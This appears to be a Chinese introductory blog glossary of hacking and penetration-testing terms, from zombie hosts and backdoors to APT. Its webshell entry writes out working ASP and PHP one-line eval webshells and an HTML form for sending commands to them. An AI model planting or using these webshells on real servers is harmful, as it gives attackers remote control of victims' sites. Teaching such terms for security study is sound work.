网络攻防第一课()
1、 脚本(asp、php、jsp)
脚本()是批处理文件的延伸,是一种纯文本保存的程序,一般来说的计算机脚本程序是确定的一系列控制计算机进行运算操作动作的组合,在其中可以实现一定的逻辑分支等。
简单地说就是一条条的文字命令,这些文字命令是可以看到的(如可以用记事本打开查看、编辑),脚本程序在执行时,是由系统的一个解释器,将其一条条的翻译成机器可识别的指令,并按程序顺序执行。因为脚本在执行时多了一道翻译的过程,所以它比二进制程序执行效率要稍低一些。
2、 html(css、js、html)
超文本标记语言,标准通用标记语言下的一个应用,是网页制作必备的编程语言。“超文本”就是指页面内可以包含图片、链接,甚至音乐、程序等非文字元素。
3、 HTTP协议
超文本传输协议(HyperText Transfer Protocol) 是互联网上应用最为广泛的一种网络协议。主要被用于在Web浏览器和网站服务器之间传递信息。HTTP 是基于 TCP/IP 协议的应用层协议。
4、 CMS(B/S)
CMS是 “Content Management System” 的缩写,意为"内容管理系统"。内容管理系统是企业信息化建设和电子政务的新宠,也是一个相对较新的市场。对于内容管理,业界还没有一个统一的定义,不同的机构有不同的理解。
5、 MD5
MD5 消息摘要算法(英语:MD5 Message-Digest Algorithm),一种被广泛使用的密码散列函数,可以产生出一个128位(16字节)的散列值(hash value),用于确保信息传输完整一致。MD5 由美国密码学家罗纳德·李维斯特(Ronald Linn Rivest)设计,于1992年公开,用以取代MD4算法。
肉鸡、抓鸡
肉鸡:被黑客入侵并长期驻扎的计算机或者服务器。
抓鸡:利用大量的程序漏洞,使用自动化方式获取肉鸡的行为。
Webshell
通过Web入侵的一种脚本工具,可以据此对网络服务进行一定的控制。
漏洞
硬件、软件、协议等等的可利用安全缺陷,可能被攻击者利用,对数据进行篡改、控制等。
一句话【木马】
通过向服务端提交一句简短的代码,配合本地客户端实现webshell功能的木马。
<%eval request ( “pass”)%>
<%execute (request ( “pass”))%>
//request ( “pass”):接受客户端提交的数据,pass为执行命令的参数值。
// eval/execute:函数执行客户端命令的内容。
如: PHP的一 句话木马:
<?phpeval($_ POST[oracer]) ;?>下面的代码可以用POST的方式提交PHP语句,利用php脚本的各种函数,就可以实现执行系统命令、修改数据库、增删改文件等等的各种功能。
<formmethod=postaction=http://木马地址>
<textareaname=cracer>
//这里写php代码
phpinfo() ;
<inputtype= submit>
提权
操作系统低权限的账户将自己提升为管理员权限使用的方法。
后门
黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个“入口”。
跳板
使用肉鸡IP来实施攻击其他目标,以便更好的隐藏自己的身份信息。
旁站入侵
即同服务器下的网站入侵,入侵之后可以通过提权跨目录等手段拿到目标网站的权限。常见的旁站查询工具有: WebRobot、御剑、明小子和web在线查询等。
C段入侵
即同C段下服务器入侵。如目标ip为192.168.1.253入侵192.168.1.*的任意一台机器,然后利用一些黑客工具嗅探获取在网络上传输的各种信息。
常用的工具有:windows下有Cain;UNIX环境下有Sniffit,Snoop,Tcpdump,Dsniff等。
渗透测试
黑盒测试:在未授权的情况下,模拟黑客的攻击方法和思维方式,来评估计算机网络系统可能存在的安全风险。
黑盒测试不同于黑客入侵,并不等于黑站。黑盒测试考验的是综合的能力(OS、Datebase、 、code、思路、社工)。
白盒测试:相对黑盒测试,白盒测试基本是从内部发起。
灰盒测试:黑白盒的另一种说法。知道源代码和不知道源代码的渗透测试。这时,黑盒测试还是传统的渗透测试,而白盒测试就偏向于代码审计。
APT 攻击
Advanced Persistent Threat,高级可持续性攻击,是指组织(特别是政府)或者小团体利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式。
极强的隐蔽性。
潜伏期长,持续性强。
目标性强。
渗透测试的特点
充满挑战与刺激 ---- 不达目的不罢休。
思路与经验积累往往决定成败。
团队
0 2
渗透测试流程
渗透测试与入侵的最大区别
渗透测试:更全面地找出服务器的问题,更倾向于保护。
入侵:不择手段地(甚至具有破坏性的)拿到权限。
经验分析
信息搜集是关键
做事不要太心急
多学习,多看源码
平时注意收集 0day
0day:泛指所有在官方发布该作品之前或者当天,这主要涵盖了影视、软件、游戏、音乐、资料等方面,由一些特别小组以一定的格式打包发布的数码内容。基本上每个0day发布作品中都包含了说明该发布作品的NFO文件,该文件主要包括发布小组的信息、发布等
来源:CSDN
作者:BEGCCYD
链接:https://blog.csdn.net/BEGCCYD/article/details/103584176